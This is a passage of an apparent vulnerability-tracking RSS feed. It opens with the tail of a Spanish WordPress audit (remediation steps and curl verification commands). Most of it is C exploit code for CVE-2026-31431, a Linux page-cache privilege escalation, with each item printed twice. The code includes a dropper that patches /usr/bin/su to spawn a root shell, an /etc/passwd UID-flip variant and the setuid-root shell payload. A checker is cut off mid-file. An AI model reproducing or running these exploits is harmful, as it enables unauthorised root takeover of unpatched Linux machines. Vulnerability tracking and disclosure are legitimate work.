(m\u00ednimo 20 chars). Eliminar wp-loginizer.php, 2ops.php y todos los ficheros de auditor\u00eda del webroot. Desactivar XML-RPC. Eliminar plugin Code Snippets y el snippet malicioso.\n    \n    \n\n      Esta semana: Actualizar Elementor a \u2265 4.0.5 (parchea CVE-2026-6127). Actualizar Apache a 2.4.67 (parchea CVE-2026-23918 y CVE-2026-24072). Auditar todos los archivos PHP modificados en los \u00faltimos 90 d\u00edas. Configurar SMTP y unificar mensajes de error de wp-login. Restringir REST API users a autenticados. A\u00f1adir cabeceras de seguridad HTTP.\n    \n    \n\n      Este mes: Implementar 2FA para el panel de administraci\u00f3n. Migrar credenciales DB a Docker secrets. Configurar DISABLE_WP_CRON y cron real del sistema. 
Implementar WAF en Cloudflare para xmlrpc.php y ?author=. Eliminar readme.html y establecer ServerTokens Prod.\n    \n  \n\n  \n\n    \nAnexo \u00b7 Comandos de verificaci\u00f3n post-remediaci\u00f3n\n    \nEjecutar estos comandos tras aplicar las correcciones para confirmar que los vectores est\u00e1n cerrados:\n    \n# C-01: XML-RPC deshabilitado\ncurl -s -X POST https://columtech.online/xmlrpc.php | grep -c \"XML-RPC server accepts\"\n# Esperado: 0\n\n# C-02: Webshells eliminadas\ncurl -o /dev/null -w \"%{http_code}\" https://columtech.online/wp-loginizer.php\n# Esperado: 404\n\n# H-03: REST users requiere autenticaci\u00f3n\ncurl -s https://columtech.online/index.php?rest_route=/wp/v2/users | jq '.code'\n# Esperado: \"rest_forbidden\"\n\n# H-03: ?author= no revela usuario\ncurl -s -o /dev/null -w \"%{redirect_url}\" \"https://columtech.online/?author=1\"\n# Esperado: vac\u00edo o URL sin slug de usuario\n\n# L-01: HSTS presente\ncurl -sI https://columtech.online/ | grep -i strict-transport\n# Esperado: Strict-Transport-Security: max-age=...\n\n# L-03: readme.html eliminado\ncurl -o /dev/null -w \"%{http_code}\" https://columtech.online/readme.html\n# Esperado: 404\n  \n\n\n\n\n\n  Auditor\u00eda realizada por c4sh3r \u00b7 Reporte generado el 2026-06-04\n  Todos los hallazgos fueron verificados en entorno real con autorizaci\u00f3n del propietario. Las pruebas de escritura (defacing, webshells) fueron limpiadas inmediatamente tras la verificaci\u00f3n. PII real redactada.\n\n\n\n\n", "creation_timestamp": "2026-06-03T23:46:41.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://vulnerability.circl.lu/sighting/5d6554f7-d228-462b-abd3-3233cbf92ca0/export</guid>
      <pubDate>Wed, 03 Jun 2026 23:46:41 +0000</pubDate>
    </item>
    <item>
      <title>443a0012-c304-40bd-906e-b2279a829e92</title>
      <link>https://vulnerability.circl.lu/sighting/443a0012-c304-40bd-906e-b2279a829e92/export</link>
      <description>{"uuid": "443a0012-c304-40bd-906e-b2279a829e92", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/spynika/f39604e6aca8dd619921a78875622691", "content": "/* SPDX-License-Identifier: LGPL-2.1-or-later OR MIT */\n/*\n * Copy Fail -- CVE-2026-31431\n * AF_ALG + splice() page-cache-mutation LPE proof-of-concept.\n *\n * Cross-platform C proof-of-concept by Tony Gies .\n *\n * Disclosed 2026-04-29 by Theori / Xint. Canonical writeup: https://copy.fail/\n *\n * Mechanism:\n *   For each 4-byte window of the embedded static-ELF payload (built from\n *   payload.c, embedded via `ld -r -b binary` -- see Makefile), runs one\n *   bogus AEAD-decrypt through AF_ALG whose ciphertext input is supplied\n *   via splice() from /usr/bin/su's page-cache pages. The authencesn\n *   template's in-place optimization treats the splice'd source pages as\n *   both ciphertext input and plaintext destination, so the (failing)\n *   decrypt has already overwritten 4 bytes of the page-cache page by\n *   the time auth verification rejects the request. Walking 4 bytes at\n *   a time across the payload deterministically writes the entire blob\n *   into the cached image of /usr/bin/su. 
execve() of the target loads\n *   the (mutated) cached pages; the unchanged on-disk inode is still\n *   setuid root, so the kernel hands the payload root creds; payload\n *   pivots into a real root shell.\n *\n * Affected kernels:\n *   floor:   torvalds/linux 72548b093ee3 (Aug 2017, 4.14, AF_ALG iov_iter\n *            rework that introduced the file-page write primitive)\n *   ceiling: torvalds/linux a664bf3d603d (Apr 2026, reverts the 2017\n *            algif_aead in-place optimization; separates src/dst\n *            scatterlists so page-cache pages can no longer be a writable\n *            crypto destination)\n *   in between: every Ubuntu, RHEL, SUSE, Amazon Linux, Debian etc.\n *   distro kernel that didn't backport the fix.\n *\n * Build: see Makefile. (`make` in this directory.)\n */\n\n#define _GNU_SOURCE\n#include \n#include \n#include \n#include \n#include \n\n#include \n\n#include \"utils.h\"\n\n/* Symbols synthesized by `ld -r -b binary -o payload.o payload`. */\nextern const unsigned char _binary_payload_start[];\nextern const unsigned char _binary_payload_end[];\n#define PAYLOAD       (_binary_payload_start)\n#define PAYLOAD_LEN   ((size_t)(_binary_payload_end - _binary_payload_start))\n\nint main(int argc, char **argv) {\n    const char *target = (argc &amp;gt; 1) ? argv[1] : \"/usr/bin/su\";\n\n    int file_fd = open(target, O_RDONLY);\n    if (file_fd &amp;lt; 0) {\n        fprintf(stderr, \"open(%s): %s\\n\", target, strerror(errno));\n        return 1;\n    }\n\n    size_t len = PAYLOAD_LEN;\n    size_t iters = (len + 3) / 4;\n\n    fprintf(stderr, \"[+] target:    %s\\n\", target);\n    fprintf(stderr, \"[+] payload:   %zu bytes (%zu iterations)\\n\", len, iters);\n\n    /* Walk the embedded payload in 4-byte windows. Last window is zero-\n     * padded if PAYLOAD_LEN isn't a multiple of 4 (the extra bytes simply\n     * land past end-of-payload in the page-cache page; harmless). 
*/\n    for (off_t off = 0; (size_t)off &amp;lt; len; off += 4) {\n        unsigned char window[4] = { 0, 0, 0, 0 };\n        size_t take = (len - (size_t)off &amp;gt;= 4) ? 4 : len - (size_t)off;\n        memcpy(window, PAYLOAD + off, take);\n\n        if (patch_chunk(file_fd, off, window) &amp;lt; 0) {\n            fprintf(stderr, \"patch_chunk failed at offset %lld\\n\",\n                    (long long)off);\n            return 1;\n        }\n    }\n\n    close(file_fd);\n\n    fprintf(stderr, \"[+] page cache mutated; exec'ing target\\n\");\n    execl(\"/bin/sh\", \"sh\", \"-c\", \"su\", (char *)NULL);\n    perror(\"execl\");\n    return 1;\n}", "creation_timestamp": "2026-06-04T07:19:08.000000Z"}</description>
      <content:encoded>{"uuid": "443a0012-c304-40bd-906e-b2279a829e92", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/spynika/f39604e6aca8dd619921a78875622691", "content": "/* SPDX-License-Identifier: LGPL-2.1-or-later OR MIT */\n/*\n * Copy Fail -- CVE-2026-31431\n * AF_ALG + splice() page-cache-mutation LPE proof-of-concept.\n *\n * Cross-platform C proof-of-concept by Tony Gies .\n *\n * Disclosed 2026-04-29 by Theori / Xint. Canonical writeup: https://copy.fail/\n *\n * Mechanism:\n *   For each 4-byte window of the embedded static-ELF payload (built from\n *   payload.c, embedded via `ld -r -b binary` -- see Makefile), runs one\n *   bogus AEAD-decrypt through AF_ALG whose ciphertext input is supplied\n *   via splice() from /usr/bin/su's page-cache pages. The authencesn\n *   template's in-place optimization treats the splice'd source pages as\n *   both ciphertext input and plaintext destination, so the (failing)\n *   decrypt has already overwritten 4 bytes of the page-cache page by\n *   the time auth verification rejects the request. Walking 4 bytes at\n *   a time across the payload deterministically writes the entire blob\n *   into the cached image of /usr/bin/su. 
execve() of the target loads\n *   the (mutated) cached pages; the unchanged on-disk inode is still\n *   setuid root, so the kernel hands the payload root creds; payload\n *   pivots into a real root shell.\n *\n * Affected kernels:\n *   floor:   torvalds/linux 72548b093ee3 (Aug 2017, 4.14, AF_ALG iov_iter\n *            rework that introduced the file-page write primitive)\n *   ceiling: torvalds/linux a664bf3d603d (Apr 2026, reverts the 2017\n *            algif_aead in-place optimization; separates src/dst\n *            scatterlists so page-cache pages can no longer be a writable\n *            crypto destination)\n *   in between: every Ubuntu, RHEL, SUSE, Amazon Linux, Debian etc.\n *   distro kernel that didn't backport the fix.\n *\n * Build: see Makefile. (`make` in this directory.)\n */\n\n#define _GNU_SOURCE\n#include \n#include \n#include \n#include \n#include \n\n#include \n\n#include \"utils.h\"\n\n/* Symbols synthesized by `ld -r -b binary -o payload.o payload`. */\nextern const unsigned char _binary_payload_start[];\nextern const unsigned char _binary_payload_end[];\n#define PAYLOAD       (_binary_payload_start)\n#define PAYLOAD_LEN   ((size_t)(_binary_payload_end - _binary_payload_start))\n\nint main(int argc, char **argv) {\n    const char *target = (argc &amp;gt; 1) ? argv[1] : \"/usr/bin/su\";\n\n    int file_fd = open(target, O_RDONLY);\n    if (file_fd &amp;lt; 0) {\n        fprintf(stderr, \"open(%s): %s\\n\", target, strerror(errno));\n        return 1;\n    }\n\n    size_t len = PAYLOAD_LEN;\n    size_t iters = (len + 3) / 4;\n\n    fprintf(stderr, \"[+] target:    %s\\n\", target);\n    fprintf(stderr, \"[+] payload:   %zu bytes (%zu iterations)\\n\", len, iters);\n\n    /* Walk the embedded payload in 4-byte windows. Last window is zero-\n     * padded if PAYLOAD_LEN isn't a multiple of 4 (the extra bytes simply\n     * land past end-of-payload in the page-cache page; harmless). 
*/\n    for (off_t off = 0; (size_t)off &amp;lt; len; off += 4) {\n        unsigned char window[4] = { 0, 0, 0, 0 };\n        size_t take = (len - (size_t)off &amp;gt;= 4) ? 4 : len - (size_t)off;\n        memcpy(window, PAYLOAD + off, take);\n\n        if (patch_chunk(file_fd, off, window) &amp;lt; 0) {\n            fprintf(stderr, \"patch_chunk failed at offset %lld\\n\",\n                    (long long)off);\n            return 1;\n        }\n    }\n\n    close(file_fd);\n\n    fprintf(stderr, \"[+] page cache mutated; exec'ing target\\n\");\n    execl(\"/bin/sh\", \"sh\", \"-c\", \"su\", (char *)NULL);\n    perror(\"execl\");\n    return 1;\n}", "creation_timestamp": "2026-06-04T07:19:08.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://vulnerability.circl.lu/sighting/443a0012-c304-40bd-906e-b2279a829e92/export</guid>
      <pubDate>Thu, 04 Jun 2026 07:19:08 +0000</pubDate>
    </item>
    <item>
      <title>50f046f9-7d39-4209-af7a-ce35b111426d</title>
      <link>https://vulnerability.circl.lu/sighting/50f046f9-7d39-4209-af7a-ce35b111426d/export</link>
      <description>{"uuid": "50f046f9-7d39-4209-af7a-ce35b111426d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/spynika/5a7493888e350d8c96772bff995cef0f", "content": "/* SPDX-License-Identifier: LGPL-2.1-or-later OR MIT */\n/*\n * Copy Fail -- CVE-2026-31431 -- /etc/passwd UID-flip variant.\n *\n * Mutates /etc/passwd's page cache to set the running user's UID field\n * to \"0000\", then execs `su `. PAM authenticates against\n * /etc/shadow (untouched) using the user's real password; on success,\n * su's setuid() reads the corrupted /etc/passwd from the page cache and\n * lands in a root shell.\n *\n * Compared to exploit.c (the binary-mutation variant), this works on\n * any system where /etc/passwd is world-readable (every standard Linux\n * system) including environments that harden setuid binaries against\n * unprivileged read access.\n *\n */\n\n#define _GNU_SOURCE\n#include \n#include \n#include \n#include \n#include \n#include \n\n#include \n\n#include \"utils.h\"\n\n/* Find the byte offset of the UID field for `username` in /etc/passwd.\n * Returns -1 on error or if the user is not found. */\nstatic off_t find_uid_offset(const char *username) {\n    int fd = open(\"/etc/passwd\", O_RDONLY);\n    if (fd &amp;lt; 0) { perror(\"open(/etc/passwd)\"); return -1; }\n\n    char buf[65536];\n    ssize_t n = read(fd, buf, sizeof buf - 1);\n    close(fd);\n    if (n &amp;lt;= 0) { perror(\"read(/etc/passwd)\"); return -1; }\n    buf[n] = '\\0';\n\n    size_t namelen = strlen(username);\n    char *line = buf;\n    while (line &amp;lt; buf + n) {\n        char *eol = memchr(line, '\\n', (buf + n) - line);\n        size_t linelen = eol ? 
(size_t)(eol - line) : (size_t)((buf + n) - line);\n\n        if (linelen &amp;gt; namelen + 1 &amp;amp;&amp;amp;\n            memcmp(line, username, namelen) == 0 &amp;amp;&amp;amp;\n            line[namelen] == ':') {\n            /* line: name:x:UID:GID:gecos:home:shell */\n            char *colon1 = memchr(line,            ':', linelen);\n            if (!colon1) break;\n            char *colon2 = memchr(colon1 + 1, ':', linelen - (size_t)(colon1 + 1 - line));\n            if (!colon2) break;\n            return (off_t)((colon2 + 1) - buf);\n        }\n        if (!eol) break;\n        line = eol + 1;\n    }\n\n    fprintf(stderr, \"[-] could not find user %s in /etc/passwd\\n\", username);\n    return -1;\n}\n\nint main(void) {\n    uid_t uid = getuid();\n    struct passwd *pw = getpwuid(uid);\n    if (!pw) { perror(\"getpwuid\"); return 1; }\n\n    fprintf(stderr, \"[+] user:    %s (uid=%u)\\n\", pw-&amp;gt;pw_name, uid);\n\n    off_t uid_offset = find_uid_offset(pw-&amp;gt;pw_name);\n    if (uid_offset &amp;lt; 0) return 1;\n\n    fprintf(stderr, \"[+] /etc/passwd UID field at offset %lld\\n\",\n            (long long)uid_offset);\n\n\n    int fd = open(\"/etc/passwd\", O_RDONLY);\n    if (fd &amp;lt; 0) { perror(\"open(/etc/passwd)\"); return 1; }\n    \n    /* Read up to 10 digits starting at uid_offset to find the field length. */\n    char fieldbuf[12] = { 0 };\n    ssize_t nr = pread(fd, fieldbuf, sizeof fieldbuf - 1, uid_offset);\n    if (nr &amp;lt; 1) { perror(\"pread\"); close(fd); return 1; }\n\n    /* Find length of the existing UID field (up to next ':') */\n    int old_uid_len = 0;\n    while (old_uid_len &amp;lt; nr &amp;amp;&amp;amp; fieldbuf[old_uid_len] != ':')\n        old_uid_len++;\n\n    if (old_uid_len == 0 || old_uid_len &amp;gt; 10) {\n        fprintf(stderr, \"[-] could not determine UID field length\\n\");\n        close(fd); return 1;\n    }\n\n    /* Left-pad old_uid_len.\n     * /etc/passwd allows leading zeros so 0000 is uid 0. 
*/\n    char padded[11];\n    memset(padded, '0', old_uid_len);\n    padded[old_uid_len] = '\\0';\n\n    fprintf(stderr, \"[+] old field: \\\"%.*s\\\" (%d bytes), new field: \\\"%s\\\" (%d bytes)\\n\",\n            old_uid_len, fieldbuf, old_uid_len, padded, old_uid_len);\n\n    /* New sanity check: verify the existing field matches getuid() to avoid corrupting /etc/passwd */\n    char expected[11];\n    snprintf(expected, sizeof expected, \"%u\", uid);\n    int expected_len = (int)strlen(expected);\n    if (old_uid_len &amp;lt; expected_len ||\n        memcmp(fieldbuf + old_uid_len - expected_len, expected, expected_len) != 0) {\n        fprintf(stderr,\n                \"[-] sanity check failed: field \\\"%.*s\\\" doesn't end with \"\n                \"expected uid \\\"%s\\\"\\n\",\n                old_uid_len, fieldbuf, expected);\n        close(fd); return 1;\n    }\n    fprintf(stderr, \"[+] sanity check ok\\n\");\n\n    /* Patch in 4-byte chunks. Read-modify-write for the final chunk if partial */\n    for (int off = 0; off &amp;lt; old_uid_len; off += 4) {\n        unsigned char chunk[4];\n        int n = old_uid_len - off &amp;lt; 4 ? old_uid_len - off : 4;\n\n        if (n &amp;lt; 4 &amp;amp;&amp;amp; pread(fd, chunk, 4, uid_offset + off) != 4) {\n            perror(\"pread on final chunk\");\n            close(fd); return 1;\n        }\n        memcpy(chunk, padded + off, n);\n\n        if (patch_chunk(fd, uid_offset + off, chunk) &amp;lt; 0) {\n            fprintf(stderr, \"[-] page-cache mutation failed at offset %lld\\n\",\n                    (long long)(uid_offset + off));\n            close(fd); return 1;\n        }\n    }\n\n    close(fd);\n\n    fprintf(stderr,\n            \"[+] /etc/passwd page cache mutated; %s's UID is now %s\\n\",\n            pw-&amp;gt;pw_name, padded);\n    fprintf(stderr,\n            \"[+] attempting cashout via `su %s`\\n\", pw-&amp;gt;pw_name);\n    fprintf(stderr,\n            \"[!] 
If su fails with \\\"Cannot determine your user name\\\"\\n\"\n            \"    (shadow-utils' caller-identity check), the page cache\\n\"\n            \"    mutation is still active. Pivot to another cashout\\n\"\n            \"    that consults /etc/passwd.\\n\");\n    fprintf(stderr,\n            \"[+] cleanup after testing (run as root):\\n\"\n            \"    echo 3 &amp;gt; /proc/sys/vm/drop_caches\\n\\n\");\n\n    execlp(\"su\", \"su\", pw-&amp;gt;pw_name, (char *)NULL);\n    perror(\"execlp(su)\");\n    return 1;\n}", "creation_timestamp": "2026-06-04T07:19:53.000000Z"}</description>
      <content:encoded>{"uuid": "50f046f9-7d39-4209-af7a-ce35b111426d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/spynika/5a7493888e350d8c96772bff995cef0f", "content": "/* SPDX-License-Identifier: LGPL-2.1-or-later OR MIT */\n/*\n * Copy Fail -- CVE-2026-31431 -- /etc/passwd UID-flip variant.\n *\n * Mutates /etc/passwd's page cache to set the running user's UID field\n * to \"0000\", then execs `su `. PAM authenticates against\n * /etc/shadow (untouched) using the user's real password; on success,\n * su's setuid() reads the corrupted /etc/passwd from the page cache and\n * lands in a root shell.\n *\n * Compared to exploit.c (the binary-mutation variant), this works on\n * any system where /etc/passwd is world-readable (every standard Linux\n * system) including environments that harden setuid binaries against\n * unprivileged read access.\n *\n */\n\n#define _GNU_SOURCE\n#include \n#include \n#include \n#include \n#include \n#include \n\n#include \n\n#include \"utils.h\"\n\n/* Find the byte offset of the UID field for `username` in /etc/passwd.\n * Returns -1 on error or if the user is not found. */\nstatic off_t find_uid_offset(const char *username) {\n    int fd = open(\"/etc/passwd\", O_RDONLY);\n    if (fd &amp;lt; 0) { perror(\"open(/etc/passwd)\"); return -1; }\n\n    char buf[65536];\n    ssize_t n = read(fd, buf, sizeof buf - 1);\n    close(fd);\n    if (n &amp;lt;= 0) { perror(\"read(/etc/passwd)\"); return -1; }\n    buf[n] = '\\0';\n\n    size_t namelen = strlen(username);\n    char *line = buf;\n    while (line &amp;lt; buf + n) {\n        char *eol = memchr(line, '\\n', (buf + n) - line);\n        size_t linelen = eol ? 
(size_t)(eol - line) : (size_t)((buf + n) - line);\n\n        if (linelen &amp;gt; namelen + 1 &amp;amp;&amp;amp;\n            memcmp(line, username, namelen) == 0 &amp;amp;&amp;amp;\n            line[namelen] == ':') {\n            /* line: name:x:UID:GID:gecos:home:shell */\n            char *colon1 = memchr(line,            ':', linelen);\n            if (!colon1) break;\n            char *colon2 = memchr(colon1 + 1, ':', linelen - (size_t)(colon1 + 1 - line));\n            if (!colon2) break;\n            return (off_t)((colon2 + 1) - buf);\n        }\n        if (!eol) break;\n        line = eol + 1;\n    }\n\n    fprintf(stderr, \"[-] could not find user %s in /etc/passwd\\n\", username);\n    return -1;\n}\n\nint main(void) {\n    uid_t uid = getuid();\n    struct passwd *pw = getpwuid(uid);\n    if (!pw) { perror(\"getpwuid\"); return 1; }\n\n    fprintf(stderr, \"[+] user:    %s (uid=%u)\\n\", pw-&amp;gt;pw_name, uid);\n\n    off_t uid_offset = find_uid_offset(pw-&amp;gt;pw_name);\n    if (uid_offset &amp;lt; 0) return 1;\n\n    fprintf(stderr, \"[+] /etc/passwd UID field at offset %lld\\n\",\n            (long long)uid_offset);\n\n\n    int fd = open(\"/etc/passwd\", O_RDONLY);\n    if (fd &amp;lt; 0) { perror(\"open(/etc/passwd)\"); return 1; }\n    \n    /* Read up to 10 digits starting at uid_offset to find the field length. */\n    char fieldbuf[12] = { 0 };\n    ssize_t nr = pread(fd, fieldbuf, sizeof fieldbuf - 1, uid_offset);\n    if (nr &amp;lt; 1) { perror(\"pread\"); close(fd); return 1; }\n\n    /* Find length of the existing UID field (up to next ':') */\n    int old_uid_len = 0;\n    while (old_uid_len &amp;lt; nr &amp;amp;&amp;amp; fieldbuf[old_uid_len] != ':')\n        old_uid_len++;\n\n    if (old_uid_len == 0 || old_uid_len &amp;gt; 10) {\n        fprintf(stderr, \"[-] could not determine UID field length\\n\");\n        close(fd); return 1;\n    }\n\n    /* Left-pad old_uid_len.\n     * /etc/passwd allows leading zeros so 0000 is uid 0. 
*/\n    char padded[11];\n    memset(padded, '0', old_uid_len);\n    padded[old_uid_len] = '\\0';\n\n    fprintf(stderr, \"[+] old field: \\\"%.*s\\\" (%d bytes), new field: \\\"%s\\\" (%d bytes)\\n\",\n            old_uid_len, fieldbuf, old_uid_len, padded, old_uid_len);\n\n    /* New sanity check: verify the existing field matches getuid() to avoid corrupting /etc/passwd */\n    char expected[11];\n    snprintf(expected, sizeof expected, \"%u\", uid);\n    int expected_len = (int)strlen(expected);\n    if (old_uid_len &amp;lt; expected_len ||\n        memcmp(fieldbuf + old_uid_len - expected_len, expected, expected_len) != 0) {\n        fprintf(stderr,\n                \"[-] sanity check failed: field \\\"%.*s\\\" doesn't end with \"\n                \"expected uid \\\"%s\\\"\\n\",\n                old_uid_len, fieldbuf, expected);\n        close(fd); return 1;\n    }\n    fprintf(stderr, \"[+] sanity check ok\\n\");\n\n    /* Patch in 4-byte chunks. Read-modify-write for the final chunk if partial */\n    for (int off = 0; off &amp;lt; old_uid_len; off += 4) {\n        unsigned char chunk[4];\n        int n = old_uid_len - off &amp;lt; 4 ? old_uid_len - off : 4;\n\n        if (n &amp;lt; 4 &amp;amp;&amp;amp; pread(fd, chunk, 4, uid_offset + off) != 4) {\n            perror(\"pread on final chunk\");\n            close(fd); return 1;\n        }\n        memcpy(chunk, padded + off, n);\n\n        if (patch_chunk(fd, uid_offset + off, chunk) &amp;lt; 0) {\n            fprintf(stderr, \"[-] page-cache mutation failed at offset %lld\\n\",\n                    (long long)(uid_offset + off));\n            close(fd); return 1;\n        }\n    }\n\n    close(fd);\n\n    fprintf(stderr,\n            \"[+] /etc/passwd page cache mutated; %s's UID is now %s\\n\",\n            pw-&amp;gt;pw_name, padded);\n    fprintf(stderr,\n            \"[+] attempting cashout via `su %s`\\n\", pw-&amp;gt;pw_name);\n    fprintf(stderr,\n            \"[!] 
If su fails with \\\"Cannot determine your user name\\\"\\n\"\n            \"    (shadow-utils' caller-identity check), the page cache\\n\"\n            \"    mutation is still active. Pivot to another cashout\\n\"\n            \"    that consults /etc/passwd.\\n\");\n    fprintf(stderr,\n            \"[+] cleanup after testing (run as root):\\n\"\n            \"    echo 3 &amp;gt; /proc/sys/vm/drop_caches\\n\\n\");\n\n    execlp(\"su\", \"su\", pw-&amp;gt;pw_name, (char *)NULL);\n    perror(\"execlp(su)\");\n    return 1;\n}", "creation_timestamp": "2026-06-04T07:19:53.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://vulnerability.circl.lu/sighting/50f046f9-7d39-4209-af7a-ce35b111426d/export</guid>
      <pubDate>Thu, 04 Jun 2026 07:19:53 +0000</pubDate>
    </item>
    <item>
      <title>65efbe6d-61fa-48d2-8e56-b2c261050a2b</title>
      <link>https://vulnerability.circl.lu/sighting/65efbe6d-61fa-48d2-8e56-b2c261050a2b/export</link>
      <description>{"uuid": "65efbe6d-61fa-48d2-8e56-b2c261050a2b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/spynika/01d9eed1d55745f89a77a3cbee9144c9", "content": "/* SPDX-License-Identifier: LGPL-2.1-or-later OR MIT */\n/*\n * Copy Fail (CVE-2026-31431) -- payload.\n *\n * Cross-platform C payload by Tony Gies .\n *\n * Cross-platform shellcode, built against the kernel's nolibc/ tiny libc.\n * payload.c is plain portable C; the per-arch syscall asm lives in\n * nolibc/arch-*.h. Supported architectures (per nolibc upstream): x86_64,\n * i386, arm, aarch64, riscv32/64, mips, ppc, s390x, loongarch, m68k, sh,\n * sparc.\n *\n * nolibc doesn't ship setuid/setgid wrappers, so we use its variadic\n * syscall() macro (nolibc/sys/syscall.h) with __NR_* constants from the\n * toolchain's . Still no embedded asm in this file.\n *\n * Runtime story: the dropper writes these bytes over the head of\n * /usr/bin/su's page-cache pages. su's on-disk inode keeps its setuid-\n * root bit, so on execve() the kernel grants effective uid 0 and then\n * loads *these* bytes from the cache as the program. main() converts\n * the ephemeral suid grant into a full root identity, then execs /bin/sh.\n *\n * Build: see Makefile. (`make` in this directory.)\n */\n\n#include \"nolibc/nolibc.h\"\n\n/* nolibc doesn't ship setuid/setgid wrappers (the kernel selftests it's\n * designed for don't need them). It does ship a portable variadic\n * syscall() macro (see nolibc/sys/syscall.h) and an execve(). The\n * __NR_* constants come from the toolchain's . 
*/\n\nint main(void) {\n    char *argv[] = { \"sh\", (char *)NULL };\n    char *envp[] = { (char *)NULL };\n    syscall(__NR_setgid, 0);\n    syscall(__NR_setuid, 0);\n    execve(\"/bin/sh\", argv, envp);\n    return 1;\n}", "creation_timestamp": "2026-06-04T07:21:57.000000Z"}</description>
      <content:encoded>{"uuid": "65efbe6d-61fa-48d2-8e56-b2c261050a2b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/spynika/01d9eed1d55745f89a77a3cbee9144c9", "content": "/* SPDX-License-Identifier: LGPL-2.1-or-later OR MIT */\n/*\n * Copy Fail (CVE-2026-31431) -- payload.\n *\n * Cross-platform C payload by Tony Gies .\n *\n * Cross-platform shellcode, built against the kernel's nolibc/ tiny libc.\n * payload.c is plain portable C; the per-arch syscall asm lives in\n * nolibc/arch-*.h. Supported architectures (per nolibc upstream): x86_64,\n * i386, arm, aarch64, riscv32/64, mips, ppc, s390x, loongarch, m68k, sh,\n * sparc.\n *\n * nolibc doesn't ship setuid/setgid wrappers, so we use its variadic\n * syscall() macro (nolibc/sys/syscall.h) with __NR_* constants from the\n * toolchain's . Still no embedded asm in this file.\n *\n * Runtime story: the dropper writes these bytes over the head of\n * /usr/bin/su's page-cache pages. su's on-disk inode keeps its setuid-\n * root bit, so on execve() the kernel grants effective uid 0 and then\n * loads *these* bytes from the cache as the program. main() converts\n * the ephemeral suid grant into a full root identity, then execs /bin/sh.\n *\n * Build: see Makefile. (`make` in this directory.)\n */\n\n#include \"nolibc/nolibc.h\"\n\n/* nolibc doesn't ship setuid/setgid wrappers (the kernel selftests it's\n * designed for don't need them). It does ship a portable variadic\n * syscall() macro (see nolibc/sys/syscall.h) and an execve(). The\n * __NR_* constants come from the toolchain's . 
*/\n\nint main(void) {\n    char *argv[] = { \"sh\", (char *)NULL };\n    char *envp[] = { (char *)NULL };\n    syscall(__NR_setgid, 0);\n    syscall(__NR_setuid, 0);\n    execve(\"/bin/sh\", argv, envp);\n    return 1;\n}", "creation_timestamp": "2026-06-04T07:21:57.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://vulnerability.circl.lu/sighting/65efbe6d-61fa-48d2-8e56-b2c261050a2b/export</guid>
      <pubDate>Thu, 04 Jun 2026 07:21:57 +0000</pubDate>
    </item>
    <item>
      <title>eeea1d39-2102-4e2c-bf7f-42510e37beec</title>
      <link>https://vulnerability.circl.lu/sighting/eeea1d39-2102-4e2c-bf7f-42510e37beec/export</link>
      <description>{"uuid": "eeea1d39-2102-4e2c-bf7f-42510e37beec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/spynika/e452783668ff5a7a3dc4cc036d3f9463", "content": "/* SPDX-License-Identifier: LGPL-2.1-or-later OR MIT */\n/*\n * Copy Fail -- CVE-2026-31431\n * Vulnerability checker.\n *\n * Detects whether the running kernel is susceptible to the AF_ALG/splice\n * page-cache mutation primitive used by exploit.c and exploit-passwd.c,\n * without touching any system file. Creates a local \"testfile\" in the\n * working directory containing the string \"init\", then runs the same\n * patch_chunk() primitive against its page cache to attempt to overwrite\n * the bytes with \"vulnerable\". Reads back to confirm whether the\n * mutation took.\n *\n * The on-disk inode is never modified; the testfile is removed on exit,\n * and the page-cache mutation evaporates with it. 
Runs unprivileged.\n *\n * Exit codes:\n *   100 - kernel is vulnerable\n *   0   - kernel is not vulnerable (primitive ran but mutation did not take)\n *   2   - AF_ALG socket family or authencesn template is unavailable;\n *         patch state cannot be determined from this test\n *   1   - other runtime error\n */\n\n#define _GNU_SOURCE\n#include \n#include \n#include \n#include \n#include \n#include \n\n#include \n\n#include \"utils.h\"\n\nstatic const char PAYLOAD[] = \"vulnerable\";\n#define PAYLOAD_LEN (sizeof PAYLOAD - 1)\n\nstatic int check_file(const char *filename) {\n    int fd = open(filename, O_RDONLY);\n    if (fd &amp;lt; 0) return 0;\n    printf(\"content of %s fd=%d ---\\n\", filename, fd);\n    char buf[256];\n    ssize_t total = read(fd, buf, sizeof buf);\n    if (total &amp;gt; 0)\n        write(STDOUT_FILENO, buf, total);\n    close(fd);\n    printf(\"\\n---\\n\");\n    return total &amp;gt;= (ssize_t)PAYLOAD_LEN &amp;amp;&amp;amp;\n           memcmp(buf, PAYLOAD, PAYLOAD_LEN) == 0;\n}\n\nstatic void init_file(const char *filename) {\n    static const char init_buf[32] = \"init\";\n    int fd = open(filename, O_RDWR | O_CREAT | O_TRUNC, 0644);\n    if (fd &amp;lt; 0) {\n        fprintf(stderr, \"open(%s): %s\\n\", filename, strerror(errno));\n        exit(1);\n    }\n    write(fd, init_buf, sizeof init_buf);\n    close(fd);\n}\n\nint main(int argc, char **argv) {\n    